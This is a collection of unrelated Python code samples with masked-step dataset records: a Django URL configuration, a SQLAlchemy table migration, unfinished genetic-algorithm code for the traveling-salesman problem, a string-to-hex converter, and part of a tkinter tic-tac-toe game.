https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
normal
|
{
"blob_id": "312a95c9514722157653365104d8cd0ada760ce8",
"index": 8084,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-3": "<mask token>\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .auth.views import account_profile\nfrom .views import member_index, member_action\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-4": "\"\"\"URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.views.generic import TemplateView\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\nfrom .auth.views import account_profile\r\nfrom .views import member_index, member_action\r\n\r\nurlpatterns = [\r\n # Landing page area\r\n url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),\r\n url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),\r\n url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),\r\n url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),\r\n\r\n # Account management is done by allauth\r\n url(r'^accounts/', include('allauth.urls')),\r\n\r\n # Account profile and member info done locally\r\n url(r'^accounts/profile/$', account_profile, name='account_profile'),\r\n url(r'^member/$', member_index, name='user_home'),\r\n url(r'^member/action$', member_action, name='user_action'),\r\n\r\n # Usual Django admin\r\n url(r'^admin/', admin.site.urls),\r\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table(
'accesses', meta,
Column('id', BigInteger, primary_key=True, nullable=False),
Column('uuid', String(255), nullable=False),
Column('created_at', DateTime),
)
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
|
normal
|
{
"blob_id": "6154979cd2853dd2bd26d1ae5df7365efa0141c2",
"index": 441,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-3": "<mask token>\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-4": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-5": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\n\nmeta = MetaData()\ntable = Table(\n 'accesses', meta,\n Column('id', BigInteger, primary_key=True, nullable=False),\n Column('uuid', String(255), nullable=False),\n Column('created_at', DateTime),\n)\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#print pathToConnectionsList(['A','C','B','D','E'])
#['EA','CB','AC','BD', 'DE']
#print independantPathPieces()
#print pathToConnectionsList(pathGenerator())
#print geneFormatToPathSegmentsMini(['CD', 'AB', 'BE', 'EC']) #DA
#print independantPathPieces(['EAC', 'CBD', 'ACB', 'BDE', 'DEA'])
#print greedyCrossover(['EC', 'CD', 'AB', 'BE','DF','FA'],['EC', 'XX', 'XX', 'XX','XX','xx'], 3)
#['ABECD', '', '__', '__']
# def joinPathBits(pathBits):
# index = 0
# for index in range(len(pathBits)):
# # figure out nex and prev point
# while matchFound:
# matchFound = False
# next = pathBits[index][-1]
# prev = pathBits[index][0]
# while True
# index2 = 1
# if next == pathBits[index2][0] and next != '_':
# join one way
# matchFound = True
# elif prev == pathBits[index2][-1] and prev != '_':
# join another
# matchFound = True
# def findpaths(segments):
# path_starts = {} # path_start:path
# path_ends = {} # path_end:path
# starts = {} # start:end of a segment
# #path_prefixes = []
# for segment in segments:
# starts[segment[0]] = segment[1]
# for start in starts:
# next = segment[start]
# if next in starts: # a longer path's been found
def writeToGene(toOrFromPos,whichCodon,whichGene,whatToWrite):
if toOrFromPos == 'to': pos = 1
if toOrFromPos == 'from': pos = 0
#print "which codon: " + str(whichCodon)
#print "postion: " + str(pos)
# check if whichgene[whichcodon is empty]
if whichCodon == 88: return whichGene # this may be the worlds ugliest hack, depending on
# _ not being a reserved char aka being in the charset but also depending on the num of cities
# in the prob to be less that 88
spot = whichGene[whichCodon]
val = whichGene[whichCodon][pos]
#print "current value: " + str(val)
if val == whatToWrite: return whichGene
if val == "_":
#spot = ['','']
#print "spot:"
#print spot
spot = list(spot)
spot[pos] = whatToWrite
#print "spot:"
#print spot
#check if val is empty
newGene = whichGene[0:whichCodon] + ["".join(spot)] + whichGene[whichCodon+1:len(whichGene)]
return newGene
return "ERROR, NON CONSISTANT VALUE ALREADY IN POS."
#print writeToGene('to',2,['__','__','__','__','__','__','xx','xx'],'o')
#writeToGene('to',3,['','','','','','','',''],"x")
def tspGeneTemplater(gene,locCodes):
# assumes that it gets a valid gene which was constructed by common elements in two parents and an additional random element from on parent.
gene = codeBlankSpots(gene)
genecopy = gene
charset = theCharset()
for codonLoc in range(len(gene)):
codon = gene[codonLoc]
if codon !='__':
whereFrom = codon[0]
whereTo = codon[1]
current = locCodes[codonLoc]
whereFromIndex = charset.index(whereFrom)
whereToIndex = charset.index(whereTo)
current = locCodes[codonLoc]
genecopy = writeToGene('from',whereToIndex,genecopy,current)
genecopy = writeToGene('to',whereFromIndex,genecopy,current)
#at this point we should have a template!!!!
# that we can fill in.
return genecopy
#print tspGeneTemplater(['BD', 'CA', '_B', 'A_'], theCharset())
def templateToGene(gene):
# GETS A FULLY TEMPLATED GENE
# MUST NOW FILL UP THE CHARS TO MAKE A VALID GENE! WHAT A DAUNTING TASK!!
# FIRST WE GET THE CHARSETS WE ARE WORKING WITH
# ONE FOR TO AND ONE FOR FROM POSITIONS
#init
chars = theCharset()[0:len(gene)]
toChars = chars
fromChars = chars
# remove already existing chars
for codon in gene:
if codon[0] != "_": fromChars = fromChars.replace(codon[0],'',1)
if codon[1] != "_":
toChars = toChars.replace(codon[1],'',1)
else:
anEmptyToSpot = gene.index(codon)
currentLoc = chars[anEmptyToSpot]
# now we have a list of to and from chars that need to be placed in a valid configuration.
# choose a blank spot to start from (anEmptyTospot)
gene = writeToGene('from',anEmptyToSpot,gene,currentLoc)
cont = True
while cont:
toLoc = random.choice(toChars)
toChars = toChars.replace(toLoc,'',1)
gene = writeToGene('from',anEmptyToSpot,gene,currentLoc)
currentLoc = toLoc
writeToGene('to',2,['__','__','x_','__','__','__','xx','xx'],'o')
return connectionList
def geneFormatToPathSegments(gene):
charset = theCharset()
segments = []
for i in range(len(gene)):
spot = charset[i]
if gene[i] != '__':
segment = str(gene[i][0]) + str(spot) + str(gene[i][1])
segments.append(segment)
return segments
def indPathPieces(segmentsList):
for thisSegment in segmentsList:
for anotherSegment in segmentsList:
if thisSegment[1:2] == anotherSegment[-2:]:
newSegment = thisSegment
def independantPathPieces(path_segments = []):
# TAKES EDGE SEGMENTS FOR EACH GENE OR SOME SUBSET OF GENES AND MAKES A STRING PATH OF MIN LENGTH
#path_segments = ['LOP','BAC','FYZ','CDF','REX', 'XWL']
#path_segments = ['EAC','CBD']
path_segments = ['EA','CB','AC','BD', 'DE']
# CAREFUL: THERE IS SOME INSANITY LOGIC GOING ON HERE!
#print "path seg: " + str(path_segments)
index = 0
while index < len(path_segments):
next = path_segments[index][-1]
for j in range(len(path_segments)):
prev = path_segments[j][0]
print "next: " + next
print "prev: " + prev
print "index:" + str(index)
print path_segments
if (next == prev) and (next != '_') :
path_segments[index] = path_segments[index] + path_segments[j][1:]
path_segments[j] = '_'
next = path_segments[index][-1]
#index -=1
print path_segments
index +=1
path_segments = [x for x in path_segments if x != '_']
#print "path seg: " + str(path_segments)
return path_segments
def makeTSPGeneX(numLocations):
# this time we are going to do things smarter.
if numLocations < 3 or numLocations > 94:
print "MAX LOCATIONS IS 94, MIN LOCATIONS IS 3."
quit()
# intialize
locationsCharset = theCharset()[0:numLocations]
path = pathMaker(numLocations)
#fromLocations = locationsCharset
locIndex = dict()
locValue = dict()
# BUILD THE INDEX AND VALUE DICTS
for i in range(numLocations):
locIndex[locationsCharset[i]] = i
locValue[i] = locationsCharset[i]
connectionList = ["" for x in range(numLocations)]
return connectionList
def completeTSPGene(pGene):
# this time we are going to do things smarter.
numLocations = len(pGene)
# intialize
locationsCharset = theCharset()[0:numLocations]
toLocations = locationsCharset
fromLocations = locationsCharset
locIndex = dict()
locValue = dict()
# BUILD THE INDEX AND VALUE DICTS
for i in range(numLocations):
locIndex[locationsCharset[i]] = i
locValue[i] = locationsCharset[i]
#connectionList = ["__" for x in range(numLocations)]
# remove existing options from charsrets.
for codon in pGene:
if codon[0] != "_": fromLocations = fromLocations.replace(codon[0],'',1)
if codon[1] != "_":
toLocations = toLocations.replace(codon[1],'',1)
else:
# grab details about a codon where the to location is empty.
anEmptyToSpot = pGene.index(codon)
currentLoc = locationsCharset[anEmptyToSpot]
# we define an empty fromLoc, we have a currentLoc, and we get a toLoc!
fromLoc = "_"
#toLoc = random.choice(toLocations)
#toLocations = toLocations.replace(currentLoc, "")
for i in range(numLocations+1):
print len(toLocations)
print len(fromLocations)
print "wherefrom: " + fromLoc
print "currentloc: " + currentLoc
print "to locs options: " + str(toLocations)
print "from locs: " + str(fromLocations)
print pGene
print
#place the from loc in the from position of the current loc
if fromLoc != "_":
pGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][1])
fromLocations = fromLocations.replace(fromLoc,'',1)
if len(toLocations) == 0:
pGene[locIndex[currentLoc]] = str(fromLoc[0] ) + str(pGene[locIndex[currentLoc]][1])
return pGene
toLoc = pGene[locIndex[currentLoc]][1]
if toLoc == "_":
# get a to loc only if needed
#if len(toLocations) == 2 and len(fromLocations) == 1 and (fromLocations == toLoc)
toLoc = currentLoc
while (toLoc == currentLoc) or (toLoc == fromLoc) :
if len(toLocations) == 0:
toLoc = locValue[anEmptyToSpot]
else:
toLoc = random.choice(toLocations)
toLocations = toLocations.replace(toLoc, "")
#place it in the to position of the current loc
pGene[locIndex[currentLoc]] = str(pGene[locIndex[currentLoc]][0]) + str(toLoc)
#prepare to move to the new loc!
fromLoc = currentLoc
currentLoc = toLoc
pGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][0])
return pGene
#print completeTSPGene(['__','CD','_B','B_','__','__','AC','FI','HA'])
|
normal
|
{
"blob_id": "b4a96d5df56acd545e9919e202c462ee710a0339",
"index": 5339,
"step-1": "#print pathToConnectionsList(['A','C','B','D','E'])\n#['EA','CB','AC','BD', 'DE']\n#print independantPathPieces()\n#print pathToConnectionsList(pathGenerator())\n#print geneFormatToPathSegmentsMini(['CD', 'AB', 'BE', 'EC']) #DA\n#print independantPathPieces(['EAC', 'CBD', 'ACB', 'BDE', 'DEA'])\n#print greedyCrossover(['EC', 'CD', 'AB', 'BE','DF','FA'],['EC', 'XX', 'XX', 'XX','XX','xx'], 3)\n\n\n#['ABECD', '', '__', '__']\n\n# def joinPathBits(pathBits):\n# \tindex = 0\n# \tfor index in range(len(pathBits)):\n# \t\t# figure out nex and prev point\n\t\t\n# \t\twhile matchFound:\n# \t\t\tmatchFound = False\n# \t\t\tnext = pathBits[index][-1]\n# \t\t\tprev = pathBits[index][0]\n\n# \t\t\twhile True\n# \t\t\tindex2 = 1\t\t\t\t\n# \t\t\tif next == pathBits[index2][0] and next != '_':\n# \t\t\t\tjoin one way\n# \t\t\t\tmatchFound = True\n# \t\t\telif prev == pathBits[index2][-1] and prev != '_':\n# \t\t\t\tjoin another\n# \t\t\t\tmatchFound = True\n\n\n\n# def findpaths(segments):\n# \tpath_starts = {} # path_start:path\n# \tpath_ends = {} # path_end:path\n# \tstarts = {} # start:end of a segment\n# \t#path_prefixes = []\n# \tfor segment in segments:\n# \t\tstarts[segment[0]] = segment[1]\n# \tfor start in starts:\n# \t\tnext = segment[start]\n# \t\tif next in starts: # a longer path's been found\n\ndef writeToGene(toOrFromPos,whichCodon,whichGene,whatToWrite):\n\tif toOrFromPos == 'to': pos = 1\n\tif toOrFromPos == 'from': pos = 0\n\t#print \"which codon: \" + str(whichCodon)\n\t#print \"postion: \" + str(pos) \n\t# check if whichgene[whichcodon is empty]\n\t\n\tif whichCodon == 88: return whichGene # this may be the worlds ugliest hack, depending on\n\t# _ not being a reserved char aka being in the charset but also depending on the num of cities\n\t# in the prob to be less that 88\n\t\n\tspot = whichGene[whichCodon]\n\tval = whichGene[whichCodon][pos]\n\t#print \"current value: \" + str(val)\n\n\tif val == whatToWrite: return whichGene\n\tif val == \"_\":\n\t\t#spot = ['','']\n\t\t#print \"spot:\"\n\t\t#print spot\n\t\tspot = list(spot)\n\t\tspot[pos] = whatToWrite\n\t\t#print \"spot:\"\n\t\t#print spot\n\n\t\t#check if val is empty\n\t\tnewGene = whichGene[0:whichCodon] + [\"\".join(spot)] + whichGene[whichCodon+1:len(whichGene)]\n\t\treturn newGene\n\t\n\treturn \"ERROR, NON CONSISTANT VALUE ALREADY IN POS.\"\n\n#print writeToGene('to',2,['__','__','__','__','__','__','xx','xx'],'o')\n#writeToGene('to',3,['','','','','','','',''],\"x\")\n\n\n\ndef tspGeneTemplater(gene,locCodes):\n\t# assumes that it gets a valid gene which was constructed by common elements in two parents and an additional random element from on parent.\n\tgene = codeBlankSpots(gene)\n\tgenecopy = gene\n\tcharset = theCharset()\n\n\tfor codonLoc in range(len(gene)):\n\t\tcodon = gene[codonLoc]\n\t\tif codon !='__':\n\t\t\twhereFrom = codon[0]\n\t\t\twhereTo = codon[1]\n\t\t\tcurrent = locCodes[codonLoc]\n\n\t\t\twhereFromIndex = charset.index(whereFrom) \n\t\t\twhereToIndex = charset.index(whereTo)\n\t\t\tcurrent = locCodes[codonLoc]\n\n\t\t\tgenecopy = writeToGene('from',whereToIndex,genecopy,current)\n\t\t\tgenecopy = writeToGene('to',whereFromIndex,genecopy,current)\n\n\t#at this point we should have a template!!!!\n\t# that we can fill in.\n\treturn genecopy\n\n#print tspGeneTemplater(['BD', 'CA', '_B', 'A_'], theCharset())\n\ndef templateToGene(gene):\n\t# GETS A FULLY TEMPLATED GENE\n\t# MUST NOW FILL UP THE CHARS TO MAKE A VALID GENE! WHAT A DAUNTING TASK!!\n\n\t# FIRST WE GET THE CHARSETS WE ARE WORKING WITH\n\t# ONE FOR TO AND ONE FOR FROM POSITIONS\n\t#init\n\tchars = theCharset()[0:len(gene)]\n\ttoChars = chars\n\tfromChars = chars\n\n\t# remove already existing chars\n\tfor codon in gene:\n\t\tif codon[0] != \"_\": fromChars = fromChars.replace(codon[0],'',1)\n\t\tif codon[1] != \"_\":\n\t\t\ttoChars = toChars.replace(codon[1],'',1)\n\t\telse:\n\t\t\tanEmptyToSpot = gene.index(codon)\n\t\t\tcurrentLoc = chars[anEmptyToSpot]\n\n\t# now we have a list of to and from chars that need to be placed in a valid configuration.\n\t# choose a blank spot to start from (anEmptyTospot)\n\tgene = writeToGene('from',anEmptyToSpot,gene,currentLoc)\n\tcont = True\n\twhile cont:\t\n\t\ttoLoc = random.choice(toChars)\n\t\ttoChars = toChars.replace(toLoc,'',1)\n\t\tgene = writeToGene('from',anEmptyToSpot,gene,currentLoc)\n\n\t\tcurrentLoc = toLoc\n\n\twriteToGene('to',2,['__','__','x_','__','__','__','xx','xx'],'o')\n\treturn connectionList\n\n\ndef geneFormatToPathSegments(gene):\n\tcharset = theCharset()\n\tsegments = []\n\tfor i in range(len(gene)):\n\t\tspot = charset[i]\n\t\tif gene[i] != '__':\n\t\t\tsegment = str(gene[i][0]) + str(spot) + str(gene[i][1])\n\t\t\tsegments.append(segment)\n\treturn segments\n\n\n\ndef indPathPieces(segmentsList):\n\tfor thisSegment in segmentsList:\n\n\t\tfor anotherSegment in segmentsList:\n\t\t\tif thisSegment[1:2] == anotherSegment[-2:]:\n\t\t\t\tnewSegment = thisSegment\n\ndef independantPathPieces(path_segments = []):\n\t# TAKES EDGE SEGMENTS FOR EACH GENE OR SOME SUBSET OF GENES AND MAKES A STRING PATH OF MIN LENGTH\n\t#path_segments = ['LOP','BAC','FYZ','CDF','REX', 'XWL']\n\t#path_segments = ['EAC','CBD']\n\tpath_segments = ['EA','CB','AC','BD', 'DE']\n\t# CAREFUL: THERE IS SOME INSANITY LOGIC GOING ON HERE!\n\t#print \"path seg: \" + str(path_segments)\n\tindex = 0\n\twhile index < len(path_segments):\n\t\tnext = path_segments[index][-1]\n\t\t\n\t\n\t\tfor j in range(len(path_segments)):\n\t\t\tprev = path_segments[j][0]\n\t\t\tprint \"next: \" + next\n\t\t\tprint \"prev: \" + prev\n\t\t\tprint \"index:\" + str(index)\n\t\t\tprint path_segments\n\t\t\tif (next == prev) and (next != '_') :\n\t\t\t\tpath_segments[index] = path_segments[index] + path_segments[j][1:]\n\t\t\t\tpath_segments[j] = '_'\n\t\t\t\tnext = path_segments[index][-1]\n\t\t\t\t#index -=1\n\n\t\t\tprint path_segments\n\t\tindex +=1\n\tpath_segments = [x for x in path_segments if x != '_']\n\t#print \"path seg: \" + str(path_segments)\n\treturn path_segments\n\n\tdef makeTSPGeneX(numLocations):\n\t# this time we are going to do things smarter.\n\tif numLocations < 3 or numLocations > 94:\n\t\tprint \"MAX LOCATIONS IS 94, MIN LOCATIONS IS 3.\"\n\t\tquit()\n\n\t# intialize\n\tlocationsCharset = theCharset()[0:numLocations]\n\tpath = pathMaker(numLocations)\n\t#fromLocations = locationsCharset\n\n\tlocIndex = dict()\n\tlocValue = dict()\n\t\n\t# BUILD THE INDEX AND VALUE DICTS\n\tfor i in range(numLocations):\n\t\tlocIndex[locationsCharset[i]] = i\n\t\tlocValue[i] = locationsCharset[i]\n\t\tconnectionList = [\"\" for x in range(numLocations)]\n\n\treturn connectionList\n\n\ndef completeTSPGene(pGene):\n\t# this time we are going to do things smarter.\n\tnumLocations = len(pGene) \n\n\t# intialize\n\tlocationsCharset = theCharset()[0:numLocations]\n\ttoLocations = locationsCharset\n\tfromLocations = locationsCharset\n\n\tlocIndex = dict()\n\tlocValue = dict()\n\t\n\t# BUILD THE INDEX AND VALUE DICTS\n\tfor i in range(numLocations):\n\t\tlocIndex[locationsCharset[i]] = i\n\t\tlocValue[i] = locationsCharset[i]\n\t\t#connectionList = [\"__\" for x in range(numLocations)]\n\n\t# remove existing options from charsrets.\n\tfor codon in pGene:\n\t\tif codon[0] != \"_\": fromLocations = fromLocations.replace(codon[0],'',1)\n\t\tif codon[1] != \"_\":\n\t\t\ttoLocations = toLocations.replace(codon[1],'',1)\n\t\telse:\n\t\t\t# grab details about a codon where the to location is empty. \n\t\t\tanEmptyToSpot = pGene.index(codon)\n\t\t\tcurrentLoc = locationsCharset[anEmptyToSpot]\n\n\t# we define an empty fromLoc, we have a currentLoc, and we get a toLoc!\n\tfromLoc = \"_\"\n\t#toLoc = random.choice(toLocations)\n\t#toLocations = toLocations.replace(currentLoc, \"\")\n\n\t\n\tfor i in range(numLocations+1):\n\t\tprint len(toLocations)\n\t\tprint len(fromLocations)\n\t\tprint \"wherefrom: \" + fromLoc\n\t\tprint \"currentloc: \" + currentLoc\n\t\tprint \"to locs options: \" + str(toLocations)\n\t\tprint \"from locs: \" + str(fromLocations)\n\t\tprint pGene\n\t\tprint \n\t\t#place the from loc in the from position of the current loc\n\t\tif fromLoc != \"_\": \n\t\t\tpGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][1])\n\t\t\tfromLocations = fromLocations.replace(fromLoc,'',1)\n\n\n\t\tif len(toLocations) == 0:\n\t\t\tpGene[locIndex[currentLoc]] = str(fromLoc[0] ) + str(pGene[locIndex[currentLoc]][1])\n\t\t\treturn pGene\n\n\t\ttoLoc = pGene[locIndex[currentLoc]][1]\n\t\tif toLoc == \"_\":\n\t\t\t# get a to loc only if needed\n\t\t\t#if len(toLocations) == 2 and len(fromLocations) == 1 and (fromLocations == toLoc)\n\n\t\t\ttoLoc = currentLoc\n\t\t\twhile (toLoc == currentLoc) or (toLoc == fromLoc) :\n\t\t\t\tif len(toLocations) == 0:\n\t\t\t\t\ttoLoc = locValue[anEmptyToSpot]\n\t\t\t\telse:\t\t\t\n\t\t\t\t\ttoLoc = random.choice(toLocations)\n\t\t\ttoLocations = toLocations.replace(toLoc, \"\")\n\n\t\t#place it in the to position of the current loc\n\t\tpGene[locIndex[currentLoc]] = str(pGene[locIndex[currentLoc]][0]) + str(toLoc)\n\n\t\t#prepare to move to the new loc!\n\t\tfromLoc = currentLoc\n\t\tcurrentLoc = toLoc\n\n\tpGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][0])\n\treturn pGene\n\n#print completeTSPGene(['__','CD','_B','B_','__','__','AC','FI','HA'])",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/python3
'''
generator.py
This program inputs a strings, and outputs the corresponding hex
Creator: Ethan Knight
Email: [email protected]
Published: 20181116
'''
import sys
import time
import binascii
def main():
print("\n", sys.version_info)
try:
while True:
print("\n\nPress Ctrl+C to exit.")
usr=test()
out=binascii.hexlify(bytes(usr, encoding="utf8"))
print("\nHex:\t\t", out)
print("Base 10:\t", int(out,16))
time.sleep(.5)
except KeyboardInterrupt:
print("\tProgram Terminated\n\n")
sys.exit(0)
def test():
while True:
usr=input("Enter the string to convert\n\n\t")
if usr!="":
return usr
else:
print("\nNo string entered.")
if __name__=="__main__":
main()
|
normal
|
{
"blob_id": "a52cbe6dbf4b4fc82d09e5f34e6e135933f3af38",
"index": 1418,
"step-1": "<mask token>\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\ndef test():\n while True:\n usr = input('Enter the string to convert\\n\\n\\t')\n if usr != '':\n return usr\n else:\n print('\\nNo string entered.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\ndef test():\n while True:\n usr = input('Enter the string to convert\\n\\n\\t')\n if usr != '':\n return usr\n else:\n print('\\nNo string entered.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport sys\nimport time\nimport binascii\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\ndef test():\n while True:\n usr = input('Enter the string to convert\\n\\n\\t')\n if usr != '':\n return usr\n else:\n print('\\nNo string entered.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/python3\n\n'''\n generator.py\n This program inputs a strings, and outputs the corresponding hex\n Creator: Ethan Knight\n Email: [email protected]\n Published: 20181116\n'''\n\nimport sys\nimport time\nimport binascii\n\ndef main():\n print(\"\\n\", sys.version_info)\n try:\n while True:\n print(\"\\n\\nPress Ctrl+C to exit.\")\n usr=test()\n out=binascii.hexlify(bytes(usr, encoding=\"utf8\"))\n print(\"\\nHex:\\t\\t\", out)\n print(\"Base 10:\\t\", int(out,16))\n time.sleep(.5)\n except KeyboardInterrupt:\n print(\"\\tProgram Terminated\\n\\n\")\n sys.exit(0)\n\ndef test():\n while True:\n usr=input(\"Enter the string to convert\\n\\n\\t\")\n if usr!=\"\":\n return usr\n else:\n print(\"\\nNo string entered.\")\n\nif __name__==\"__main__\":\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import tkinter as tk
from functools import partial
from numpy import random
from base import NinePalaceGame
class SingleMode(NinePalaceGame):
player1 = player = 'O'
player2 = computer = 'X'
def __init__(self):
self.create_choose_one_window()
super().__init__()
self.main_game_window.mainloop()
def player_play(self, i, j):
if not self.game_is_over and not self.box[i][j]:
self.box[i][j] = 1
self.value_group[i][j].set(self.dominance)
self.dominance = self.computer
return 1
return 0
def computer_play(self):
if not self.game_is_over:
while 1:
i, j = random.choice(range(3)), random.choice(range(3))
if not self.box[i][j]:
self.box[i][j] = 1
self.value_group[i][j].set(self.computer)
self.dominance = self.player
break
def judge(self):
if self.check_win(self.player):
self.game_is_over = 1
self.billboard_value.set('Player is win!')
elif self.check_win(self.computer):
self.game_is_over = 1
self.billboard_value.set('Computer is win!')
elif self.check_game_over():
self.game_is_over = 1
self.billboard_value.set('Game over!')
def reset(self):
super().reset()
self.dominance = self.player
self.box = [
[0, 0, 0], [0, 0, 0], [0, 0, 0]]
self.main_game_window.withdraw()
